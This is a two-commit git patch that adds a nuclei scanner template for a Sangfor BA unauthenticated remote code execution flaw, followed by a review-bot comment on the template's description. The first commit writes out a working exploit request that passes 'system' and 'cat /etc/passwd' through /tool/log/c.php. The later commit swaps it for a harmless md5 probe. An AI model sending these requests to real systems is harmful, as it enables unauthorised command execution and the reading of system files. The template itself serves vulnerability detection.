From c82ef1fb6801f4f0e8be7586a48da8e62cbea1d8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 12 May 2022 00:17:57 +0530
Subject: [PATCH 1/2] Create sangfor-ba-rce.yaml
---
 vulnerabilities/other/sangfor-ba-rce.yaml | 24 +++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 vulnerabilities/other/sangfor-ba-rce.yaml
diff --git a/vulnerabilities/other/sangfor-ba-rce.yaml b/vulnerabilities/other/sangfor-ba-rce.yaml
new file mode 100644
index 0000000000..aa4e848483
--- /dev/null
+++ b/vulnerabilities/other/sangfor-ba-rce.yaml
@@ -0,0 +1,24 @@
+id: sangfor-ba-rce
+
+info:
+ name: Sangfor BA RCE
+ author: ritikchaddha
+ severity: critical
+ description: A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+ tags: rce,sangfor
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=cat+/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
From 430cc1ea033137cb41759c03825948d0e953131f Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 23 May 2022 16:27:59 +0530
Subject: [PATCH 2/2] Update sangfor-ba-rce.yaml
---
 vulnerabilities/other/sangfor-ba-rce.yaml | 18 ++++++++++++------
 1 file changed, 12 insertions(+), 6 deletions(-)
diff --git a/vulnerabilities/other/sangfor-ba-rce.yaml b/vulnerabilities/other/sangfor-ba-rce.yaml
index aa4e848483..cd0740ebf0 100644
--- a/vulnerabilities/other/sangfor-ba-rce.yaml
+++ b/vulnerabilities/other/sangfor-ba-rce.yaml
@@ -1,23 +1,29 @@
 id: sangfor-ba-rce
 
 info:
- name: Sangfor BA RCE
+ name: Sangfor BA - Remote Code Execution
 author: ritikchaddha
 severity: critical
- description: A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+ description: |
+ A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+ reference:
+ - https://mobile.twitter.com/sec715/status/1406886851072253953
+ metadata:
+ verified: true
+ fofa-query: app="sangfor"
 tags: rce,sangfor
 
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=cat+/etc/passwd"
+ - "{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}"
 
 matchers-condition: and
 matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
+ - type: word
 part: body
+ words:
+ - '{{md5("{{randstr}}")}}'
 
 - type: status
 status:
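Review bot: The new `description: |` block in `info` still only says the product "execute[s] arbitrary commands" and does not record that this template deliberately probes with `strip_slashes=md5&host={{randstr}}` and matches `{{md5("{{randstr}}")}}` instead of calling `system`, so a later edit could reintroduce a destructive payload without noticing the design choice. Suggest appending to the description block: `The strip_slashes parameter of /tool/log/c.php appears to be used as a PHP callable name; this template invokes md5 on a random marker and matches the digest in the response body, proving code execution without running a shell command.` — the callable behaviour is inferred from the payload rather than shown in this diff, so keep the hedge. The only `reference` is a single tweet, an ephemeral source; if a vendor advisory or CVE exists it should be added, but none is visible here. Minor: `description: |` keeps a trailing newline in the value; `description: |-` would avoid that, though nuclei tolerates either.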